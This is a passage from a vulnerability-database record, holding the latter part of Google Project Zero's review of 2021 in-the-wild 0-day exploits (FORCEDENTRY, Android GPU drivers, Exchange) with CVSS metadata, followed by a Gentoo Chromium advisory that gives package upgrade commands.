[CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>). [TieLei Wang explained via Twitter](<https://twitter.com/WangTielei/status/1486266258152726530>) that they had found the vulnerability in December 2020 and had noticed it was fixed in beta versions of iOS 14.4 and macOS 11.2 which is why they presented it at Zer0Con. The in-the-wild exploit only targeted macOS 10, but used the same exploitation technique as the one presented.\n\nThe two FORCEDENTRY exploits ([CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) and the [sandbox escape](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>)) were the only times that made us all go \u201cwow!\u201d this year. For [CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), the integer overflow in CoreGraphics, it was because: \n\n 1. For years we\u2019ve all heard about how attackers are using 0-click iMessage bugs and finally we have a public example, and\n 2. The exploit was an impressive work of art. \n\nThe sandbox escape (CVE requested, not yet assigned) was impressive because it\u2019s one of the few times we\u2019ve seen a sandbox escape in-the-wild that uses only logic bugs, rather than the standard memory corruption bugs. \n\nFor [CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), the vulnerability itself wasn\u2019t especially notable: a classic integer overflow within the JBIG2 parser of the CoreGraphics PDF decoder. The exploit, though, was described by Samuel Gro\u00df & Ian Beer as \u201cone of the most technically sophisticated exploits [they]\u2019ve ever seen\u201d. [Their blogpost shares all the details](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), but the highlight is that the exploit uses the logical operators available in JBIG2 to build NAND gates which are used to build its own computer architecture. The exploit then writes the rest of its exploit using that new custom architecture. From their blogpost:\n\nUsing over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.\n\nThe bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.\n\nThis is an example of what making 0-day exploitation hard could look like: attackers having to develop a new and novel way to exploit a bug and that method requires lots of expertise and/or time to develop. This year, the two FORCEDENTRY exploits were the only 0-days out of the 58 that really impressed us. Hopefully in the future, the bar has been raised such that this will be required for any successful exploitation.\n\n## Android\n\nThere were 7 Android in-the-wild 0-days detected and disclosed this year. Prior to 2021 there had only been 1 and it was in 2019: [CVE-2019-2215](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-2215.html>). Like WebKit, this lack of data makes it hard for us to assess trends and changes. Instead, we\u2019ll compare it to public security research.\n\nFor the 7 Android 0-days they targeted the following components:\n\n * Qualcomm Adreno GPU driver ([CVE-2020-11261](<https://source.android.com/security/bulletin/2021-01-01>), [CVE-2021-1905](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1905.html>), [CVE-2021-1906](<https://source.android.com/security/bulletin/2021-05-01>))\n * ARM Mali GPU driver ([CVE-2021-28663](<https://source.android.com/security/bulletin/2021-05-01>), [CVE-2021-28664](<https://source.android.com/security/bulletin/2021-05-01>))\n * Upstream Linux kernel ([CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>), [CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>))\n\n5 of the 7 0-days from 2021 targeted GPU drivers. This is actually not that surprising when we consider the evolution of the Android ecosystem as well as recent public security research into Android. The Android ecosystem is quite fragmented: many different kernel versions, different manufacturer customizations, etc. If an attacker wants a capability against \u201cAndroid devices\u201d, they generally need to maintain many different exploits to have a decent percentage of the Android ecosystem covered. However, if the attacker chooses to target the GPU kernel driver instead of another component, they will only need to have two exploits since most Android devices use 1 of 2 GPUs: either the Qualcomm Adreno GPU or the ARM Mali GPU. \n\nPublic security research mirrored this choice in the last couple of years as well. When developing full exploit chains (for defensive purposes) to target Android devices, [Guang Gong](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>), [Man Yue Mo](<https://securitylab.github.com/research/one_day_short_of_a_fullchain_android/>), and [Ben Hawkes](<https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html>) all chose to attack the GPU kernel driver for local privilege escalation. Seeing the in-the-wild 0-days also target the GPU was more of a confirmation rather than a revelation. Of the 5 0-days targeting GPU drivers, 3 were in the Qualcomm Adreno driver and 2 in the ARM Mali driver. \n\nThe two non-GPU driver 0-days ([CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>) and [CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>)) targeted the upstream Linux kernel. Unfortunately, these 2 bugs shared a singular characteristic with the Android in-the-wild 0-day seen in 2019: all 3 were previously known upstream before their exploitation in Android. While the sample size is small, it\u2019s still quite striking to see that 100% of the known in-the-wild Android 0-days that target the kernel are bugs that actually were known about before their exploitation.\n\nThe vulnerability now referred to as [CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>) was actually found in September 2016 and [discussed on the Linux kernel mailing lists](<https://lore.kernel.org/lkml/CAOssrKcfncAYsQWkfLGFgoOxAQJVT2hYVWdBA6Cw7hhO8RJ_wQ@mail.gmail.com/>). A [patch was even developed back in 2016](<https://lore.kernel.org/lkml/1475150954-10152-1-git-send-email-mszeredi@redhat.com/>), but it didn\u2019t end up being submitted. The bug was finally [fixed in the Linux kernel in July 2021](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cbcf01128d0a92e131bd09f1688fe032480b65ca>) after the detection of the in-the-wild exploit targeting Android. The patch then made it into the [Android security bulletin in November 2021](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>).\n\n[CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>) remained unpatched in Android for 14 months after it was patched in the Linux kernel. The Linux kernel was actually only vulnerable to the issue for a few weeks, but due to Android patching practices, that few weeks became almost a year for some Android devices. If an Android OEM synced to the upstream kernel, then they likely were patched against the vulnerability at some point. But many devices, such as recent Samsung devices, had not and thus were left vulnerable.\n\n## Microsoft Exchange Server\n\nIn 2021, there were 5 in-the-wild 0-days targeting Microsoft Exchange Server. This is the first time any Exchange Server in-the-wild 0-days have been detected and disclosed since we began tracking in-the-wild 0-days. The first four ([CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>)) were all disclosed and patched at the same time and used together in a [single operation](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). The fifth ([CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>)) was patched on its own in November 2021. [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>) was demonstrated at Tianfu Cup and then discovered in-the-wild by Microsoft. While no other in-the-wild 0-days were disclosed as part of the chain with [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>), the attackers would have required at least another 0-day for successful exploitation since [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>) is a post-authentication bug.\n\nOf the four Exchange in-the-wild 0-days used in the first campaign, [CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>), which is also known as \u201cProxyLogon\u201d, is the only one that\u2019s pre-auth. [CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>) is a server side request forgery (SSRF) vulnerability that allows unauthenticated attackers to send arbitrary HTTP requests as the Exchange server. The other three vulnerabilities were post-authentication. For example, [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) allowed attackers to write arbitrary files to the system. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is a remote code execution vulnerability due to a deserialization bug in the Unified Messaging service. This allowed attackers to run code as the privileged SYSTEM user.\n\nFor the second campaign, [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>), like [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), is a post-authentication RCE vulnerability due to insecure deserialization. It seems that while attempting to harden Exchange, Microsoft inadvertently introduced another deserialization vulnerability.\n\nWhile there were a significant amount of 0-days in Exchange detected and disclosed in 2021, it\u2019s important to remember that they were all used as 0-day in only two different campaigns. This is an example of why we don\u2019t suggest using the number of 0-days in a product as a metric to assess the security of a product. Requiring the use of four 0-days for attackers to have success is preferable to an attacker only needing one 0-day to successfully gain access.\n\nWhile this is the first time Exchange in-the-wild 0-days have been detected and disclosed since Project Zero began our tracking, this is not unexpected. In 2020 there was [n-day exploitation of Exchange Servers](<https://www.cisa.gov/uscert/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>). Whether this was the first year that attackers began the 0-day exploitation or if this was the first year that defenders began detecting the 0-day exploitation, this is not an unexpected evolution and we\u2019ll likely see it continue into 2022.\n\n# Outstanding Questions\n\nWhile there has been progress on detection and disclosure, that progress has shown just how much work there still is to do. The more data we gained, the more questions that arose about biases in detection, what we\u2019re missing and why, and the need for more transparency from both vendors and researchers.\n\nUntil the day that attackers decide to happily share all their exploits with us, we can\u2019t fully know what percentage of 0-days are publicly known about. However when we pull together our expertise as security researchers and anecdotes from others in the industry, it paints a picture of some of the data we\u2019re very likely missing. From that, these are some of the key questions we\u2019re asking ourselves as we move into 2022:\n\n## Where are the [x] 0-days?\n\nDespite the number of 0-days found in 2021, there are key targets missing from the 0-days discovered. For example, we know that messaging applications like WhatsApp, Signal, Telegram, etc. are targets of interest to attackers and yet there\u2019s only 1 messaging app, in this case iMessage, 0-day found this past year. Since we began tracking in mid-2014 the total is two: a WhatsApp 0-day in 2019 and this iMessage 0-day found in 2021.\n\nAlong with messaging apps, there are other platforms/targets we\u2019d expect to see 0-days targeting, yet there are no or very few public examples. For example, since mid-2014 there\u2019s only one in-the-wild 0-day each for macOS and Linux. There are no known in-the-wild 0-days targeting cloud, CPU vulnerabilities, or other phone components such as the WiFi chip or the baseband.\n\nThis leads to the question of whether these 0-days are absent due to lack of detection, lack of disclosure, or both?\n\n## Do some vendors have no known in-the-wild 0-days because they\u2019ve never been found or because they don\u2019t publicly disclose?\n\nUnless a vendor has told us that they will publicly disclose exploitation status for all vulnerabilities in their platforms, we, the public, don\u2019t know if the absence of an annotation means that there is no known exploitation of a vulnerability or if there is, but the vendor is just not sharing that information publicly. Thankfully this question is something that has a pretty clear solution: all device and software vendors agreeing to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited in-the-wild.\n\n## Are we seeing the same bug patterns because that\u2019s what we know how to detect?\n\nAs we described earlier in this report, all the 0-days we saw in 2021 had similarities to previously seen vulnerabilities. This leads us to wonder whether or not that\u2019s actually representative of what attackers are using. Are attackers actually having success exclusively using vulnerabilities in bug classes and components that are previously public? Or are we detecting all these 0-days with known bug patterns because that\u2019s what we know how to detect? Public security research would suggest that yes, attackers are still able to have success with using vulnerabilities in known components and bug classes the majority of the time. But we\u2019d still expect to see a few novel and unexpected vulnerabilities in the grouping. We posed this question back in the 2019 year-in-review and it still lingers. \n\n## Where are the spl0itz?\n\nTo successfully exploit a vulnerability there are two key pieces that make up that exploit: the vulnerability being exploited, and the exploitation method (how that vulnerability is turned into something useful). \n\nUnfortunately, this report could only really analyze one of these components: the vulnerability. Out of the 58 0-days, only 5 have an exploit sample publicly available. Discovered in-the-wild 0-days are the failure case for attackers and a key opportunity for defenders to learn what attackers are doing and make it harder, more time-intensive, more costly, to do it again. Yet without the exploit sample or a detailed technical write-up based upon the sample, we can only focus on fixing the vulnerability rather than also mitigating the exploitation method. This means that attackers are able to continue to use their existing exploit methods rather than having to go back to the design and development phase to build a new exploitation method. While acknowledging that sharing exploit samples can be challenging (we have that challenge too!), we hope in 2022 there will be more sharing of exploit samples or detailed technical write-ups so that we can come together to use every possible piece of information to make it harder for the attackers to exploit more users.\n\nAs an aside, if you have an exploit sample that you\u2019re willing to share with us, please reach out. Whether it\u2019s sharing with us and having us write a detailed technical description and analysis or having us share it publicly, we\u2019d be happy to work with you.\n\n# Conclusion\n\nLooking back on 2021, what comes to mind is \u201cbaby steps\u201d. We can see clear industry improvement in the detection and disclosure of 0-day exploits. But the better detection and disclosure has highlighted other opportunities for progress. As an industry we\u2019re not making 0-day hard. Attackers are having success using vulnerabilities similar to what we\u2019ve seen previously and in components that have previously been discussed as attack surfaces.The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. And while we made distinct progress in detection and disclosure it has shown us areas where that can continue to improve.\n\nWhile this all may seem daunting, the promising part is that we\u2019ve done it before: we have made clear progress on previously daunting goals. In 2019, we discussed the large detection deficit for 0-day exploits and 2 years later more than double were detected and disclosed. So while there is still plenty more work to do, it\u2019s a tractable problem. There are concrete steps that the tech and security industries can take to make it even more progress: \n\n\n 1. Make it an industry standard behavior for all vendors to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited,\n 2. Vendors and security researchers sharing exploit samples or detailed descriptions of the exploit techniques.\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.\n\nThrough 2021 we continually saw the real world impacts of the use of 0-day exploits against users and entities. Amnesty International, the Citizen Lab, and others highlighted [over](<https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/>) and [over](<https://www.amnesty.org/en/documents/doc10/4491/2021/en/>) how governments were using commercial surveillance products against [journalists](<https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/>), [human rights defenders](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>), and [government officials](<https://www.reuters.com/technology/exclusive-us-state-department-phones-hacked-with-israeli-company-spyware-sources-2021-12-03/>). We saw many enterprises scrambling to remediate and protect themselves from the [Exchange Server 0-days](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). And we even learned of peer [security researchers being targeted by ](<https://blog.google/threat-analysis-group/update-campaign-targeting-security-researchers/>)[North Korean government hackers](<https://blog.google/threat-analysis-group/update-campaign-targeting-security-researchers/>). While the majority of people on the planet do not need to worry about their own personal risk of being targeted with 0-days, 0-day exploitation still affects us all. These 0-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful in these attacks.\n\n2021 showed us we\u2019re on the right track and making progress, but there\u2019s plenty more to be done to make 0-day hard.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-19T00:00:00", "type": "googleprojectzero", "title": "\nThe More You Know, The More You Know You Don\u2019t Know\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4654", "CVE-2019-13720", "CVE-2019-2215", "CVE-2019-6625", "CVE-2020-0688", "CVE-2020-11261", "CVE-2020-16009", "CVE-2020-27932", "CVE-2020-27950", "CVE-2021-0920", "CVE-2021-1048", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1844", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-28310", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30737", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-30883", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-36948", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-41773", "CVE-2021-42321", "CVE-2022-21882", "CVE-2022-22587"], "modified": "2022-04-19T00:00:00", "id": "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156", "href": "https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T18:59:29", "description": "### Background\n\nChromium is an open-source browser project that aims to build a safer, faster, and more stable way for all users to experience the web. \n\nGoogle Chrome is one fast, simple, and secure browser for all your devices. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-90.0.4430.93\"\n \n\nAll Google Chrome users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/google-chrome-90.0.4430.93\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-30T00:00:00", "type": "gentoo", "title": "Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", "CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-2119", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193", "CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199", "CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21206", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21220", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2021-04-30T00:00:00", "id": "GLSA-202104-08", "href": "https://security.gentoo.org/glsa/202104-08", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}